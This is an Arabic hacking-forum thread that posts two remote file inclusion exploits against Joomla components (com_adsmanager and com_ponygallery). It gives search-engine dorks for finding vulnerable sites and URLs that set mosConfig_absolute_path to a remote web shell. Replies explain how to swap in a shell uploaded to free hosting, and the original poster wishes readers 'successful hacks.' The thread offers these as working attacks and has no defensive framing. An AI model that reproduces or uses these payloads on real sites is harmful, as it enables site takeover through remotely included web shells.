السلام عليكم ورحمة الله تعالى و بركاته ظهرت ثغرتان جديدتان في سكريبت joomla الثغرة الاولى Joomla Component com_adsmanager Remote File Include تاريخ...

hacker-10

New Member
ثغرات جديدة في سكربت Joomla
السلام عليكم ورحمة الله تعالى و بركاته

ظهرت ثغرتان جديدتان في سكريبت joomla

الثغرة الاولى Joomla Component com_adsmanager Remote File Include

تاريخ اكتشاف الثغرة 23/12/2010

مكتشف الثغرة : AtT4CKxT3rR0r1ST

تحميل السكربت : http://downloads.ziddu.com/downloadfiles/10982893/com_adsmanager.zip

و الآن الشيء المهم

الدورك :
PHP:
inurl:"com_adsmanager"

الاستغلال :

PHP:
www.site.com/index.php?option=com_adsmanager&mosConfig_absolute_path=[shell.txt?]

حيث site.com هو الموقع

و [?shell.txt] هو رابط الشل بصيغة txt
-----------------------------------
الثغرة الثانية
Joomla Component com_ponygallery Remote File Inclusion Vulnerabilities


تاريخ اكتشاف الثغرة 23/12/2010

مكتشف الثغرة AtT4CKxT3rR0r1ST

الدورك

PHP:
inurl:"com_ponygallery"
الاستغلال


PHP:
www.site.com/components/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=[shell.txt?]

او


PHP:
www.site.com/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=[shell.txt?]

حيث site.com هو الموقع

و [?shell.txt] هو رابط الشل بصيغة txt

شباب لي طلب ...ممكن شرح لكيفية رفع الشل من هذه الثغرة

اختراقات موفقة

 
التعديل الأخير:

b3sht

New Member
ثغرات جديدة في سكربت Joomla
مشكووور خوي ع الثغرة


و عاد انا مبتدئ ما اعرف .

بس بدل كلمة ?shell.txt

حط رابطة الشل المرفوع
 

hacker-10

New Member
ثغرات جديدة في سكربت Joomla
شكرا لكما على المرور العطر
نعم بدل shell.txt? تحط رابط الشل اللي رفعتو على استضافة مجانية مثلا ripway او freewebtown
 
أعلى